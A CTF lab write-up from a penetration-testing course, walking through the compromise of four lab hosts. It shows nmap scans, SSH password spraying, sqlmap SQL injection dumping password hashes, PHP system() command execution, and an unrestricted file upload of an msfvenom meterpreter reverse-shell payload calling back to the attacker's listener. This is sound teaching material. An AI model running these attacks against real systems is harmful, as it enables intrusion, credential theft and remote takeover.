Second CTF from eLearnSecurity's PTS course.
Blackbox szenario.
[web application vulnerabilities, SQL injection]
Connected to internal network via eth0.
Task: find flags on all hosts connected to network.
⇒ Tools used: Nmap,BurpSuite, Dirb, Sqlmap, Metasploit (MSFvenom, MSFpayload & Listener for reverse TCP shell)
- Taking advantage of DNS and virtual hosts
- Bypassing client-side access controls
- Abusing unrestricted file upload to achieve remote code execution
Stage I - Information Gathering:
lab environment, no OSINT applicable
Stage II - Footprinting and Scanning
Nmap
Stage III - Vulnerability Assessment
Nessus
Stage IV - Web Attacks
Dirb - Enumerating web resources SQLMap - SQL Injections
Stage V - System Attacks
N/A
Starting the mapping routine with with nmap scan for live hosts in our network 172.16.64.0/24
Nmap
┌──(root💀kali)-[~]
└─# nmap -sn 172.16.64.0/24 -oN discovery.nmap
to sort the discovered IP addresses with our attacking IP address excluded. Then writing this to a txt file with which we perform a full TCP scan
┌──(root💀kali)-[~]
└─# cat discovery.nmap | grep for
Nmap scan report for 172.16.64.81
Nmap scan report for 172.16.64.91
Nmap scan report for 172.16.64.92
Nmap scan report for 172.16.64.166
Nmap scan report for 172.16.64.10
┌──(root💀kali)-[~]
└─# cat discovery.nmap | grep for | grep -v
Usage: grep [OPTION]... PATTERNS [FILE]...
Try 'grep --help' for more information.
┌──(root💀kali)-[~]
└─# cat discovery.nmap | grep for | grep -v "\.10" 2 ⨯
Nmap scan report for 172.16.64.81
Nmap scan report for 172.16.64.91
Nmap scan report for 172.16.64.92
Nmap scan report for 172.16.64.166
┌──(root💀kali)-[~]
└─# cat discovery.nmap | grep for | grep -v "\.10" | cut -d " " -f 5 > ipscan.txt
┌──(root💀kali)-[~]
└─# cat ipscan.txt
172.16.64.81
172.16.64.91
172.16.64.92
172.16.64.166
Using these commands for main Nmap scan and network mapping:
• -sV for version identification
• -n for disabling reverse DNS lookup
• -v for Verbose
• -Pn to assume the host is alive
• -p- to scan all the ports
• -T4 to speed things up
• -iL to use a list of IPs as input(ipscan.txt)
• -A to run all scans in order to maximize output
Ok, so we hava a full TCP scan of the network:
┌──(root💀kali)-[~] └─# nmap -sV -n -v -Pn -p- -T4 -iL ipscan.txt -A --open
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 13:29 EST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 13:29 Completed NSE at 13:29, 0.00s elapsed Initiating NSE at 13:29 Completed NSE at 13:29, 0.00s elapsed Initiating NSE at 13:29 Completed NSE at 13:29, 0.00s elapsed Initiating ARP Ping Scan at 13:29 Scanning 4 hosts [1 port/host] Completed ARP Ping Scan at 13:29, 0.14s elapsed (4 total hosts) Initiating SYN Stealth Scan at 13:29 Scanning 4 hosts [65535 ports/host] Discovered open port 8080/tcp on 172.16.64.166 Discovered open port 53/tcp on 172.16.64.92 Discovered open port 22/tcp on 172.16.64.92 Discovered open port 80/tcp on 172.16.64.91 Discovered open port 80/tcp on 172.16.64.92 Discovered open port 22/tcp on 172.16.64.81 Discovered open port 80/tcp on 172.16.64.81 Discovered open port 63306/tcp on 172.16.64.92 Discovered open port 13306/tcp on 172.16.64.81 SYN Stealth Scan Timing: About 49.09% done; ETC: 13:30 (0:00:32 remaining) Discovered open port 6379/tcp on 172.16.64.91 Discovered open port 2222/tcp on 172.16.64.166 Completed SYN Stealth Scan against 172.16.64.166 in 60.39s (3 hosts left) Completed SYN Stealth Scan against 172.16.64.81 in 60.46s (2 hosts left) Completed SYN Stealth Scan against 172.16.64.92 in 60.46s (1 host left) Completed SYN Stealth Scan at 13:30, 60.48s elapsed (262140 total ports) Initiating Service scan at 13:30 Scanning 11 services on 4 hosts Completed Service scan at 13:30, 16.52s elapsed (11 services on 4 hosts) Initiating OS detection (try #1) against 4 hosts Retrying OS detection (try #2) against 4 hosts Retrying OS detection (try #3) against 4 hosts Retrying OS detection (try #4) against 4 hosts Retrying OS detection (try #5) against 4 hosts NSE: Script scanning 4 hosts. Initiating NSE at 13:31 Completed NSE at 13:31, 8.50s elapsed Initiating NSE at 13:31 Completed NSE at 13:31, 1.40s elapsed Initiating NSE at 13:31 Completed NSE at 13:31, 0.02s elapsed Nmap scan report for cms.foocorp.io (172.16.64.81) Host is up (0.071s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 df:60:fc:fc:db:4b:be:b6:3e:7a:4e:84:4c:a1:57:7d (ECDSA) |_ 256 ce:8c:fe:bd:76:77:8e:bd:c9:b8:8e:dc:66:b8:80:38 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |http-favicon: Unknown favicon MD5: D9D96DC60A8AEA55B0288E7A1D43ECC0 | http-methods: | Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 10 disallowed entries | /assets/ /css/ /emails/ /img/ /includes/ /install/ |_/lang/ /sociallogin/ /templates/ /upload/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Log in » FooCorp File Sharing 13306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2 | mysql-info: | Protocol: 10 | Version: 5.7.25-0ubuntu0.16.04.2 | Thread ID: 6465 | Capabilities flags: 63487 | Some Capabilities: SupportsCompression, Support41Auth, ConnectWithDatabase, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, IgnoreSigpipes, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: bfX\x1A(\x19\x12MCc\x08\x01,.\x06^nD | Auth Plugin Name: mysql_native_password MAC Address: 00:50:56:87:EB:CC (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/13%OT=22%CT=1%CU=36143%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=60281AFB%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S)
Uptime guess: 0.565 days (since Fri Feb 12 23:57:35 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=257 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 71.44 ms 172.16.64.81
Nmap scan report for 172.16.64.91
Host is up (0.076s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn t have a title (text/html).
6379/tcp open redis Redis key-value store
MAC Address: 00:50:56:87:5D:60 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/13%OT=80%CT=1%CU=44772%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=60281AFB%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 0.596 days (since Fri Feb 12 23:13:29 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros
TRACEROUTE HOP RTT ADDRESS 1 75.52 ms 172.16.64.91
Nmap scan report for 172.16.64.92 Host is up (0.076s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f4:86:09:b3:d6:d1:ba:d0:28:65:33:b7:82:f7:a6:34 (RSA) | 256 3b:d7:39:c3:4f:c4:71:a2:16:91:d1:8f:ac:04:a8:16 (ECDSA) |_ 256 4f:43:ac:70:09:a6:36:c6:f5:b2:28:b8:b5:53:07:4c (ED25519) 53/tcp open domain dnsmasq 2.75 | dns-nsid: |_ bind.version: dnsmasq-2.75 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |http-title: Photon by HTML5 UP 63306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2 | mysql-info: | Protocol: 10 | Version: 5.7.25-0ubuntu0.16.04.2 | Thread ID: 2164 | Capabilities flags: 63487 | Some Capabilities: SupportsCompression, Support41Auth, ConnectWithDatabase, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, IgnoreSigpipes, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: \x0FA\x07=<}e\x0Ej\x0B\x03d}*MI30Gz | Auth Plugin Name: mysql_native_password MAC Address: 00:50:56:87:DA:08 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/13%OT=22%CT=1%CU=32145%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=60281AFB%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S)
Uptime guess: 0.618 days (since Fri Feb 12 22:42:10 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 75.63 ms 172.16.64.92
Nmap scan report for 172.16.64.166 Host is up (0.077s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a6:1e:f8:c6:eb:32:0a:f6:29:c8:de:86:b7:4c:a0:d7 (RSA) | 256 b9:94:56:c7:4d:63:ad:bd:2d:5e:26:43:75:78:07:6f (ECDSA) |_ 256 d6:82:45:0a:51:4e:01:2d:6a:be:fa:cf:75:de:46:a0 (ED25519) 8080/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Ucorpora Demo MAC Address: 00:50:56:87:B3:22 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/13%OT=2222%CT=1%CU=38731%PV=Y%DS=1%DC=D%G=Y%M=005056 OS:%TM=60281AFB%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=I%II OS:=I%TS=8)SEQ(SP=103%GCD=1%ISR=103%TI=Z%II=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4 OS:E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%O6=M4E7ST11)WIN( OS:W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210 OS:%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R OS:=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z% OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y% OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.586 days (since Fri Feb 12 23:27:05 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 77.24 ms 172.16.64.166
NSE: Script Post-scanning. Initiating NSE at 13:31 Completed NSE at 13:31, 0.00s elapsed Initiating NSE at 13:31 Completed NSE at 13:31, 0.00s elapsed Initiating NSE at 13:31 Completed NSE at 13:31, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 4 IP addresses (4 hosts up) scanned in 101.47 seconds Raw packets sent: 263495 (11.611MB) | Rcvd: 263336 (10.548MB)
Let's start with attacking the 172.16.64.166 machine. Port 8080 is open, so let's check the web application on URL http://172.16.64.166:8080/
Without yet crawling the website but rather looking at it's main functionalities and interesting areas we can find that the “About Us” section has a login area. Not much to see here, however on inspecting the page's source code we can see that the content is already hiddenly available:
Inspecting the site with BurpSuite Repeater:
Saving these names is probably a good idea.
Alright so what else do we have. Nmap reported an open port on 2222 for SSH which is unusual already, but let's look at it in more detail by trying to log in with the usernames that we just found in the form ssh <username>@172.16.64.166 -p 2222
That was easy. The user 'Sabrina' didn't change her password and we could simply use CHANGEME to gain access.
sabrina@xubuntu:~$ ls
flag.txt hosts.bak
The hosts.bak file contains this:
127.0.0.1 localhost
172.16.64.81 cms.foocorp.io
172.16.64.81 static.foocorp.io
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
==> The SSH attack we just did is called "Password Spraying" and essentially is using one password for each identified user once -such as CHANGEME in this case- in order to not lock the accounts out. Here the password was suggested in the terminal. In real-life engagements, you might want to try passwords like “February2021” once for every user –the larger the enterprise the better the odds that someone will use a password in such format.
Since we just obtained the virtual host for IP 172.16.64.81 let's move on to attack it next.
To do that we first add the /etc/host file with the virtual host so that we can resolve the host names from our machine.
172.16.64.81 cms.foocorp.io
172.16.64.81 static.foocorp.io
Now our system can resolve these host names into IP addresses and simultaneously, add the proper host-header to the HTTP requests in order for the back-end server to serve with the appropriate virtual host
Fine, so once we've updated /etc/hosts let's visit cms.foocorp.io
By the way, since BurpSuite requires premium membership to crawl websites I'll go with OWASP ZAP for crawling, besides that BurpSuite seems more fun at least to me. But you can probably use either.
Burp and ZAP are very similar in terms of functionality.
Ok, so what do we find with our web crawling. While analyzing all folders with ZAP we find that in the website's img folder there's a backup file with user credentials!
OK, so we got
john1:password123
peter:youdonotguessthatone5
let's try it on cms.foocorp.io
getting redirected to URL /500.php.
The requested URL /500.php was not found on this server.
However, upon inspecting this redirection in BurpSuite we find credentials!
Turns out that the application leaks database credentials in its headers. Let's use these to log into the database. We have the port from the nmap scan so we're good to go.
x41x41x412019!
13306
Aaaand, yes, indeed. We're in:
searching within the database gets us the flag:
MySQL [(none)]> use cmsbase;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [cmsbase]> show tables;
+----------------------------+
| Tables_in_cmsbase |
+----------------------------+
| flag |
| sqlmapfile |
| tbl_1_actions_log |
| tbl_1_categories |
| tbl_1_categories_relations |
| tbl_1_downloads |
| tbl_1_files |
| tbl_1_files_relations |
| tbl_1_folders |
| tbl_1_groups |
| tbl_1_members |
| tbl_1_members_requests |
| tbl_1_notifications |
| tbl_1_options |
| tbl_1_password_reset |
| tbl_1_users |
| tbl_actions_log |
| tbl_categories |
| tbl_categories_relations |
| tbl_downloads |
| tbl_files |
| tbl_files_relations |
| tbl_folders |
| tbl_groups |
| tbl_members |
| tbl_members_requests |
| tbl_notifications |
| tbl_options |
| tbl_password_reset |
| tbl_users |
+----------------------------+
30 rows in set (0.054 sec)
MySQL [cmsbase]> select * from flag;
+----+------------------------------+
| id | content |
+----+------------------------------+
| 1 | Congratulations, you got it! |
+----+------------------------------+
1 row in set (0.063 sec)
MySQL [cmsbase]>
In our nmap scan we saw that there's a DNS server in the network. Let's compromise it next.
Visiting 172.16.64.92 a JavaScript pop-up alert shows up:
While inspecting the source code
<script src="assets/js/footracking.js"></script>
looks interesting. Clicking it leads to this:
alert("Loaded!");
<!-- pre-login collect data -->
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
console.log("OK");
} else {
console.log("Error!");
}
xhr.open("GET", "http://127.0.0.1/72ab311dcbfaa40ca0739f5daf505494/tracking2.php", true);
xhr.send("ua=" + navigator.userAgent + "&platform=" + navigator.platform);
}
Ok, let's play with that a bit. It seems that the alert box came from this script. Also, we notice the link is pointing to localhost. We can check if this path is valid on the server side: http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking2.php
Nope, restricted area. For tracking2 - ok let's see if tracking in the URL without the 2 at the end changes anything. http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php
Alright, tracking.php exists on the server but the button seems broken. Let's inspect it on Burp:
Reading the source code we can reconstruct the parameter and issue a valid request to the URL as follows:
And get to the site containing id=1.
Let's then further check for SQL vulnerabilities adding id=1' or 's'='s
Great!
Ok, let's sqlmap this now
$ sqlmap -u http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=1 --users
SQL Injection vulnerability is officially confirmed, let's dump the tables.
─(root💀kali)-[~]
└─# sqlmap -u http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=1 –dump -D footracking -T users
[4 entries]
+----+-----+-------------------------------------------+-----------+
| id | adm | password | username |
+----+-----+-------------------------------------------+-----------+
| 1 | yes | c5d71f305bb017a66c5fa7fd66535b84 | fcadmin1 |
| 2 | yes | 14d69ee186f8d9bbeddd4da31559ce0f | fcadmin2 |
| 3 | yes | 827ccb0eea8a706c4c34a16891f84e7b (12345) | tracking1 |
| 4 | no | e10adc3949ba59abbe56e057f20f883e (123456) | tracking2 |
+----+-----+-------------------------------------------+-----------+
Ok, so we got user/password combinations, let's enumerate with dirb to find hidden urls for http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494
(root💀kali)-[~]
└─# dirb http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494
It show's a /login path on the server. We dump the credentials here. And it works. We're in the Admin console :)
The URL is http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/panel.php so it's a php console. We can verify by typing phpinfo(); into the panel:
Browsing through the console we find the flag in /var/www
echo "<pre>";system("ls -la /var/www");echo"</pre>";system("cat /var/www/flag.txt");
system("cat /var/www/flag.txt");
since it's a DNS server let's check out the /etc/hosts file where we find this path:
172.16.64.91 75ajvxi36vchsv584es1.foocorp.io
visiting the 172.16.64.91 brings us to the default Apache page but since we add:
172.16.64.91 75ajvxi36vchsv584es1.foocorp.io
to our local /etc/hosts file, we get access to a different page. 404 not found, oops. Ok, time to enumerate with dirb.
┌──(root💀kali)-[~]
└─# dirb http://75ajvxi36vchsv584es1.foocorp.io
dirb finds http://75ajvxi36vchsv584es1.foocorp.io/app
So this page comes up with an annoying javascript pop up all the time.
Besides that the page has an upload form that doesn't work, inspecting the source code it says 'upload/upload.php'. We can replace locally as follows:
<html>
<body style="background: black; color: white;">
<script src="http://75ajvxi36vchsv584es1.foocorp.io/app/js/auth.js"></script>
<center>
<div style="border: 1px yellow double">
<br /><br />
<form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload/upload.php" method="post" enctype="multipart/form-data">
<br />Select file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload" name="submit">
</form>
<br /><br />
</div>
</center>
<hr />
<br />
<center>© FooCORP 2021</center>
<body>
</html>
Checking with this modification the app still seems broken. Let's switch to dirb if it found something else.
Indeed: /app/ is another path we can visit: app/upload which redirects to upload.php
Let's modify in Burp and use http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php, instead of http://75ajvxi36vchsv584es1.foocorp.io/app/upload/upload.php
<html>
<body style="background: black; color: white;">
<script src="http://75ajvxi36vchsv584es1.foocorp.io/app/js/auth.js"></script>
<center>
<div style="border: 1px yellow double">
<br /><br />
<form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php" method="post" enctype="multipart/form-data">
<br />Select file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload" name="submit">
</form>
<br /><br />
</div>
</center>
<hr />
<br />
<center>FooCORP 2021</center>
<body>
</html>
Now, let's upload a simple php file that we name php.php
<?
phpinfo();
?>
The file is stored and accessible on /app/upload/
Ok, since this works we can now set up a listener with metasploit, create a meterpreter php file with msfvenom and upload the meterpreter php file to get a shell.
Metasploit listener:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 172.16.64.12
lhost => 172.16.64.12
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
Remember tha we need to run metasploit as root if we want to listen on ports in the range 1-1024. Ok, let's create the meterpreter php file
$ msfvenom -p php/meterpreter_reverse_tcp lhost=172.16.64.12 lport=443 -o shell.php
We can upload shell.php the same way as php.php
Instantly a meterpreter terminal opens, here we enter:
$ shell
$ bash -i
And that's it , from here we simply navigate the directories and find the missing flag!